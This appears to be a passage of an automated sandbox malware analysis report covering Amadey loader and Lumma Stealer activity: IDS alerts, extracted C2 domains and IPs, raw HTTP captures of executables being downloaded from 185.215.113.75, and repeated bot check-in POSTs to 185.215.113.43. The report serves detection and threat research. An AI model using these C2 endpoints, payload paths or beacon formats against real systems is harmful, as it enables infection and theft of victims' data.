Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49715
Source: Network traffic Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.8:64005 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.8:63877 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.8:64311 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.8:63877 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.8:61283 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.8:52251 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.8:57398 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.8:65231 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49987
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.8:50004 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.8:58096 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49943 -> 104.102.49.254:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: pleasedcfrown.biz
Source: Malware configuration extractor URLs: affordtempyo.biz
Source: Malware configuration extractor URLs: mixedrecipew.biz
Source: Malware configuration extractor URLs: hoursuhouy.biz
Source: Malware configuration extractor URLs: suggestyuoz.biz
Source: Malware configuration extractor URLs: lightdeerysua.biz
Source: Malware configuration extractor URLs: toppyneedus.biz
Source: Malware configuration extractor URLs: impolitewearr.biz
Source: Malware configuration extractor URLs: edcatiofireeu.shop
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:24 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:19:15 GMTContent-Type: application/octet-streamContent-Length: 2150912Last-Modified: Tue, 11 Feb 2025 16:41:29 GMTConnection: keep-aliveETag: "67ab7db9-20d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 4b 00 00 04 00 00 8c 28 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6f 61 73 6a 63 61 79 00 50 1a 00 00 e0 30 00 00 4a 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 67 74 6b 70 74 77 6b 00 10 00 00 00 30 4b 00 00 04 00 00 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075538001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 37 35 35 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1075542001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
